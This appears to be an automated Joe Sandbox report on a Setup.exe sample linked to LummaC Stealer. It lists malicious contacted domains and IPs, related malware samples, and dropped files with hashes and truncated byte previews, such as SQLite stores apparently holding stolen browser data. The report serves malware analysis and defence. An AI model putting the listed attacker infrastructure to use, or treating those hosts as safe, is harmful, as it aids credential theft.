http://anglebug.com/7556	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	msedge.exe, 0000001B.00000002.3292220755.00001ECC0016C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl3.digic	Setup.exe, 00000008.00000002.2201230145.0000013798372000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000008.00000003.2200528192.0000013798372000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-preprod.corp.google.com/	chrome.exe, 00000017.00000003.3146086230.0000597C004D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://goto.google.com/sme-bugs27	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/187425444	chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/	chrome.exe, 00000017.00000003.3157200493.0000597C00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3152330343.0000597C00D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3150440283.0000597C00D18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000017.00000003.3183718358.0000597C0240C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://html4/loose.dtd	shi732E.tmp.0.dr	false		high
http://anglebug.com/3584	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4551	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5881	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/253522366	chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 00000017.00000003.3150071889.0000597C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149442975.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.3149994959.0000597C0038C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
45.130.41.93	cyberyoda.icu	Russian Federation	198610	BEGET-ASRU	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
5.75.212.196	ikores.sbs	Germany	24940	HETZNER-ASDE	true
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569580
Start date and time:	2024-12-05 21:49:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal81.troj.spyw.evad.winEXE@55/80@8/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 75% Number of executed functions: 94 Number of non-executed functions: 189
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 173.194.220.84, 172.217.17.46, 172.217.19.202, 172.217.17.42, 172.217.17.74, 142.250.181.106, 216.58.208.234, 142.250.181.10, 142.250.181.138, 172.217.19.234, 13.107.42.16, 13.107.21.239, 204.79.197.239, 13.107.6.158, 204.79.197.203, 40.126.53.15, 20.190.181.4, 20.231.128.67, 40.126.53.6, 40.126.53.7, 20.190.181.0, 20.190.181.5, 40.126.53.12
Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, optimizationguide-pa.googleapis.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, bingadsedgeextension-prod.trafficmanager.net, otelrules.azureedge.net, api.edgeoffer.microsoft.com, a-0003.a-msedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, b-0005.b-msedge.net, www-msn-com.a-0003.a-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, l-0007.config.skype.com, business.bing.com, clients.l.google.com, dual-a-0036.a-msedge.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Setup.exe

Simulations

Behavior and APIs

Time	Type	Description
15:50:13	API Interceptor	1x Sleep call for process: lem.exe modified
15:50:19	API Interceptor	498x Sleep call for process: Suicide.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.com	Get hash	malicious	EvilProxy, HTMLPhisher	Browse
	http://omenkid.top	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	https://www.freelancer.com/users/login-quick.php?token=02fff9bf9f8b7efe683f539f10a258726ae01239eb8f0b9b57526578d393fc63&url=https%3A%2F%2Fwww.google.com.bn%2Furl%3Ffnc%3Da9XTEoexMBpyPYn99soX%26ndp%3Dm6lKEDZMuBIQeZn7RBkX%26sa%3Dt%26pfuv%3DBY2IJKbokHGBEdfDSRyz%26ncbe%3DtA02sXUJ4dkStFSKl5Bg%26db%3DoBemf3zEg5VOxgJRxd3H%26fg%3DSSndprYXntqQtLjEHziw%26url%3Damp%252Fdocumentsviewnow.s3-website.us-east-2.amazonaws.com&user_id=1719536768&uniqid=76018695-412152-662ef280-88c3	Get hash	malicious	Unknown	Browse
	https://docsend.com/view/nw5cttresp36nsvc	Get hash	malicious	Unknown	Browse
	https://kitces.emlnk1.com/	Get hash	malicious	Unknown	Browse
	https://pipemongolia.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPWVuTmliazA9JnVpZD1VU0VSMDMxMjIwMjRVNTYxMjAzNTc=N0123N%5bEMAIL%5d	Get hash	malicious	Unknown	Browse
	https://www.calameo.com/read/00783464726989e2a209a	Get hash	malicious	Unknown	Browse
	http://dollar-king.net	Get hash	malicious	Unknown	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	Ttok18.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	jtkhikadjthsad.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	o26qobnkQI.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	ton.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	ton.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	mtbkkesfthae.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://cocain.vip/	Get hash	malicious	Unknown	Browse	149.154.167.99
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exe	Get hash	malicious	Remcos	Browse	94.245.104.56
	oLY6JbNl9i.bat	Get hash	malicious	Unknown	Browse	94.245.104.56
	9aTcxCmLgM.bat	Get hash	malicious	Unknown	Browse	94.245.104.56
	4l5IFxl9t3.bat	Get hash	malicious	Unknown	Browse	94.245.104.56
	B3N4x4meoJ.bat	Get hash	malicious	Unknown	Browse	94.245.104.56
	098aPtSbmd.bat	Get hash	malicious	RHADAMANTHYS	Browse	94.245.104.56
	loader.ps1.bat	Get hash	malicious	RHADAMANTHYS	Browse	94.245.104.56
	ton.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	mtbkkesfthae.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	pyjnkasedf.exe	Get hash	malicious	Vidar	Browse	94.245.104.56

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	149.154.167.220
	ozctQoBg1o.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SPhzvjk8wx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Q0Sh31btX8.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	o7H9XLUD9z.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	764GVLyJne.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lQyRqxe4dt.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	G14yjXDQWf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ti5nuRV7y4.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	cavKcghGwI.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
HETZNER-ASDE	https://sendgb.com/Aw8gObHpGVR?utm_medium=dZJEAfc2MGnvjBD	Get hash	malicious	HTMLPhisher	Browse	5.161.50.209
	payload_1.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	213.239.239.164
	ky.ps1	Get hash	malicious	Unknown	Browse	148.251.114.233
	List of Required items xlsx.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	213.239.239.164
	ab.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	213.239.239.164
	script.vbs	Get hash	malicious	Unknown	Browse	148.251.114.233
	mg.vbs	Get hash	malicious	Unknown	Browse	148.251.114.233
	mj.ps1	Get hash	malicious	Unknown	Browse	148.251.114.233
	ap.ps1	Get hash	malicious	Unknown	Browse	148.251.114.233
	cu.ps1	Get hash	malicious	Unknown	Browse	148.251.114.233
BEGET-ASRU	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse	5.101.153.57
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	185.155.118.34
	splppc.elf	Get hash	malicious	Unknown	Browse	81.200.117.158
	arm5.elf	Get hash	malicious	Unknown	Browse	193.168.46.153
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	87.236.16.19
	GNUCXbYadp.exe	Get hash	malicious	DCRat	Browse	5.101.153.48
	t8xf0Y1ovi.exe	Get hash	malicious	DCRat	Browse	185.50.25.59
	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse	5.101.153.173
	file.exe	Get hash	malicious	Amadey, Xmrig	Browse	87.236.16.19
	file.exe	Get hash	malicious	Xmrig	Browse	87.236.16.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Synaptics.exe	Get hash	malicious	XRed	Browse	149.154.167.99 5.75.212.196
	DKfcEFnBtm.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 5.75.212.196
	vj3dH1vmYe.exe	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99 5.75.212.196
	NIsNyN2CTq.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 5.75.212.196
	TPDKSYfEac.exe	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.99 5.75.212.196
	YQbn27ZkYY.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 5.75.212.196
	FWAvf7mctB.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 5.75.212.196
	3FodBfenJs.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 5.75.212.196
	lj8shy7Er0.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 5.75.212.196
	y9K6WtNbUT.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 5.75.212.196

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\402438\Suicide.com	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse
	ton.exe	Get hash	malicious	Vidar	Browse
	ton.exe	Get hash	malicious	Vidar	Browse
	File.exe	Get hash	malicious	Orcus, Xmrig	Browse
	Full_Setup_v24.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, LummaC Stealer	Browse
	'Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	!SET__UP.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\559de9.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	429648
Entropy (8bit):	6.5118628891981665
Encrypted:	false
SSDEEP:	12288:hl7GrJZsRtP01Ab+biU50unhTzTQWNy7koDG6zTe:L7UJaR10A+biU50unhFNyfG6fe
MD5:	9E6415F08B0807B8CEAC1EE89D8045A9
SHA1:	AAC35C0D5F04E789C33F029723A53EF38305955F
SHA-256:	CC322B5E834594FE63AA09BD4BA53B2F52C15136F5D5556E26A99C4BA00EFD96
SHA-512:	4122DC98A945F121F3836D7E8A378D08000F19AEC94BA807E1578CA9A2378EC5ADB15CD1BCA8AE370B7186EA52FA350B551B33E62C4ABB221530A91804402BDF
Malicious:	false
Preview:	...@IXOS.@.....@E~.Y.@.....@.....@.....@.....@.....@......&.{BF99BD40-5B10-4B93-AA83-429E8C408451}..Setup..Setup.msi.@.....@.....@.....@........&.{E0F293FF-F9D5-4C95-80EE-A8361BF1CA07}.....@.....@.....@.....@.......@.....@.....@.......@......Setup......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{79B9F234-9F00-482D-8BEC-944130F09304}&.{BF99BD40-5B10-4B93-AA83-429E8C408451}.@......&.{6E68FD45-DBD1-4112-A14B-590B6AA86CAE}&.{BF99BD40-5B10-4B93-AA83-429E8C408451}.@......&.{B6B915B2-8E9A-4251-A700-A3FA1E40B040}&.{BF99BD40-5B10-4B93-AA83-429E8C408451}.@......&.{85138663-7876-4819-88C6-B2A1707A608F}&.{BF99BD40-5B10-4B93-AA83-429E8C408451}.@........CreateFolders..Creating folders..Folder: [1]#.,.C:\Program Files (x86)\Lemcorporation\Setup\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]....C:\Users\Public\Desktop\....!.C:\Users\Public\Desktop\Setup.exe....WriteRegis

C:\ProgramData\5FUK68YUSJM7\C2VKNO8Q1

Download File

Process:	C:\Users\user\AppData\Local\Temp\402438\Suicide.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\5FUK68YUSJM7\GLX4O8

Download File

Process:	C:\Users\user\AppData\Local\Temp\402438\Suicide.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\5FUK68YUSJM7\NYMOHD

Download File

Process:	C:\Users\user\AppData\Local\Temp\402438\Suicide.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Setup.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1074688
Entropy (8bit):	6.174440720286702
Encrypted:	false
SSDEEP:	24576:yrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tva+o:y2EYTb8atv1orq+pEiSDTj1VyvBa+
MD5:	7CD7B906FB5F3E5273F26DE707A33037
SHA1:	58A8D6EFBD52CD8260F1167FC52CC12A3ECF2381
SHA-256:	B2820888F54418B7A056B606586F3DF60B91BD7DB2B4343B545C70D9E66DFD46
SHA-512:	5649B64851CD2A500210D5E1A4DDBE743674C0F7D85498060D145F969E5C87FA9A5588B64135463C1B46FE0A99D4191B3F9C985F828620AFBF0143AD97353F82
Malicious:	true
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..PG."(..PG.+PF..RG..9I.{PG..9D.PG..9..PG.+P.PG..9E.PG.Rich+PG.........................PE..d.....Qg.........."......4...........T.........@..........................................`...@...............@..............................\..\|............@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...\|..............@....pdata..Ho...@...p..................@..@.rsrc................<..............@..@.reloc..t............Z..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5Ltll:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	A5BB6D3732EFB1F0C13CCB17451A286E
SHA1:	4A5CC29F1D332F1781A924381E5B7183CF9928F9
SHA-256:	552D03793D7F59EF539D9DC29F37443BED49893078A93B59EE3F54F8F45F849A
SHA-512:	2C5EA73A996DAB755F4766611683634DA131735A940CA5628C52BD85E91C59E58E99CFD9B8132C16054007E4AC645937C81893DA063CAA58772B9CB27B421720
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\402438\Suicide.com
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.372798572807279
Encrypted:	false
SSDEEP:	48:SfNaoCudWTECuC/fNaoCAC9fNaoCeFGFBCeFvfNaoCeFN0UrU0U8C8:6NnCNTEChXNnCACpNnCe8vCeJNnCe70i
MD5:	BF7A44623C046EE5381089F3C7C648DF
SHA1:	988D7DFA0E8AE610F449E984755DFF736C09537D
SHA-256:	7FAA21AB1A920E72AC53028E6829FA8576AB6AF3D07FF82F70F91AB4C0418F58
SHA-512:	45C714A7F5F19532199CB111B0A165330AD23C4F75958E848416795F32B50FF7E31155E5F1BD6EA36299F9E272FEF3BC747AA5E9893EED6DD3CC1E4A52CB02F5
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5BE4FBDBA84B155433EFF5675FB5C844",.. "id": "5BE4FBDBA84B155433EFF5675FB5C844",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5BE4FBDBA84B155433EFF5675FB5C844"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6BF8FD3CDD3A0BD645E48007F18C7B59",.. "id": "6BF8FD3CDD3A0BD645E48007F18C7B59",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6BF8FD3CDD3A0BD645E48007F18C7B59"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\lem[1].exe

Download File

Process:	C:\Users\Public\Desktop\Setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1192690
Entropy (8bit):	7.97814839761367
Encrypted:	false
SSDEEP:	24576:Agkb+FVzgbGp2lwg27Rr+4rHSUgAEmEqnWbzv54qtpaxNlZzVWNFKQF5B1yrp:A672a2Q1byLPzB4qaX0Nbyrp
MD5:	82CCD973E00420A4768BC76D2F442F52
SHA1:	893C63DAD01EB0367C11325EFBF8492E193B15C3
SHA-256:	37919954152F36FB936BA48B6418C1172471FF9CC4627A7F3F941353E2C17B91
SHA-512:	CF6404AF60401833F623EE9CD6732C451E97392B18B682A62ADCDDCDEC17A062472C9385B13F585EF2A5A1E9BF1B8424409BE95E1DCE7B8A597124D4E801D599
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................0............@.................................@.......................R....R...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\402438\N

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	616256
Entropy (8bit):	7.999706856605573
Encrypted:	true
SSDEEP:	12288:kEqnNQOULFK7mwGetB1VjDAEOm1fSNHKKRNlU/gJK5dcGVVI1zMp2HI7NHX5V/K:kEqnNoFK7FbB/DAEOpFKENlIlVW1zqHy
MD5:	A1E27735C62920884D7290B37D09145B
SHA1:	7E7184AC38B3DB65344C243E14AE5ED2A31CEA49
SHA-256:	F1756FD26A5F53CCCFDAF28C98BF84004187F70D67D5711A9FD8B157FE0B1019
SHA-512:	2FFC0EA0947CFEF9383DA475C70D35B6D2D504DEEC202DEB22474D8EFD82AA04B72328254A523DD2CAC5B214A6EFFD2BFED585831EBE2187A315079918E2097F
Malicious:	false
